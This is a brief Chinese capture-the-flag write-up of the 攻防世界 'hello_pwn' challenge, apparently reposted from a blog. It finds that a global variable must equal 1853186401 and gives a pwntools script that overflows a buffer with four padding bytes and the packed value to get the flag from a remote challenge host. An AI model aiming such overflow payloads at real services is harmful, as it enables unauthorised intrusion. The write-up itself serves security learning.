攻防世界—pwn—hello_pwn

题目分析

下载文件后首先使用checksec检查文件保护机制

使用ida查看伪代码


思路明确,让dword_60106C == 1853186401即可输出flag

信息收集

偏移量

sub_400686函数地址

编写脚本

from pwn import *

p = remote('111.198.29.45',36884)
#p = process("./pwn002")
payload = "A"*4 + p64(1853186401)
p.sendline(payload)
p.interactive()

本地测试

靶机测试

猜你喜欢

转载自www.cnblogs.com/anweilx/p/12628439.html